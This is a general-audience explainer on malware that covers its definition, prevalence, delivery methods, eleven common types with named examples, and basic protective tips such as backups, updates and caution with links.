What is malware? Judging by the definition, «malicious software» is any kind of working code made by someone, created specifically to cause damage to a device, steal data, or gain access to your finances. The type of damage can greatly vary: from stealing to encryption (with later ransom demands), from hijacking of social media accounts to transferring all your money into some criminal’s pocket. Back in the 90s and early 2000s, these malicious programs were called “viruses”, but now, as it is not technically correct, a more neutral term is used.
There is a lot of malware. Almost 600,000 new pieces are detected every day, and over 1 billion are currently active. Mobile phones are most vulnerable: according to Kaspersky Security Network, in the first quarter of 2021 they detected almost 1,5 million of mobile malware installation packages, most of them adware, the second runner up is the mobile banking trojans category (the ones that steal your money).
There are two main types of malware attacks. An automatic attack is when the malware is self-replicating according to the pre-programmed script: after infecting a PC or smartphone it uses them as a jumping-off ground for further dissemination. Manually coordinated attacks on specific targets when hackers are going for a specific company, factory, or even city administration, using phishing tricks to deliver the malware into the system.
The main ways of malware delivering are: phishing (luring emails or messages that contain the malicious link), system vulnerabilities, infected websites (where every time the page loads, the infected code will attempt to sneak on to your device), infected torrents and other scenarios involving social engineering.
Today, the most common types of malware are computer viruses, ransomware, worms, trojan horses and spyware. There are also hybrids or polyfunctional malware which can combine several types of threat in one. There are also weird and hardly-detectable types like polymorphic malware, which changes its code, or fileless malware that only exists in a system’s RAM. We will tell you details about the 11 most common types to keep you informed about the very possible threats of today’s web.
What it does: serves unwanted advertisements
Delivered: with the torrents, with the unsafe apps, via email
Notable examples: Fireball, DeskAd
What it does: secures remote access to a computer for a hacker
Delivered: as a part of the trojan, or via phishing ar a separate program
Notable examples: FinSpy, Zacinlo
What it does: infects IoT devices and gadgets, use them later as cannon fodder for DDoS attacks
Delivered: automatically via exploits
Notable examples: Echobot, Mirai family
|Type: Computer worm
What it does: spreads through a network by replicating itself, damaging the host files
Delivered: self-spreading via security failures
Notable examples: Stuxnet, Mydoom
|Type: Fileless Malware
What it does: makes changes to system files
Delivered: Mainly phishing
Notable examples: Astaroth, SamSam, Meterpreter
What it does: stealing data with a possible further ransom demand
Delivered: as a part of other viruses, phishing, or via unsafe apps
Notable examples: TrickBot
What it does: monitors and writes down users’ keystrokes
Delivered: Business Email Compromise, phishing
Notable examples: Olympic Vision
What it does: use the host’s device to mine cryptocurrency for its master
Delivered: via unsafe apps, torrents, phishing
Notable examples: CoinMiner, MrbMiner
What it does: encrypt and/or steal data, demands a ransom in cryptocurrency (by the way, you should never pay it)
Delivered: numerous, from exploit kits, scan-and-exploit techniques, and RDP servers to the using of backdoored software installers and classical phishing
Notable examples: REvil aka GandCrab aka Sodinokibi
What it does: give its master full control of what the host does
Delivered: via phishing and unsafe apps
Notable examples: DarkHotel, Internet Optimizer, CoolWebSearch
What it does: disguises itself as a “good” code, then gain full control over the device
Delivered: via unsafe apps, torrents, phishing
Notable examples: IcedID, Pegasus, Cerberus, Emotet, Dridex
What to do to avoid meeting with these guys:
- Always use anti-malware security software.
- Don’t download files or apps from weird places. Even with popular stores (like Google Play), think twice before installing something and, in the case of mobile apps, always check what privileges they are demanding.
- Don’t click that link. And that pop-up too. And that file attached to this suspicious e-mail.
- Do the backups of all important information.
- Use the password manager and/or strong passwords. Always change the default credentials everywhere.
- Constantly update everything that needs to be updated to avoid being the victim of some exploit.
- Be aware of the current cyber threats to be ready for the encounter.
Malware is one of the most dangerous threats to mankind these days, when all critical infrastructure is dependent on computers. It is billions of dollars worth of economic damage each year, by causing system failure, wasting resources and corrupting important data.
And it makes life significantly harder for common internet users. However, if conforming these simple rules listed above, your chance of encountering the virus will be relatively low. So do this and be safe!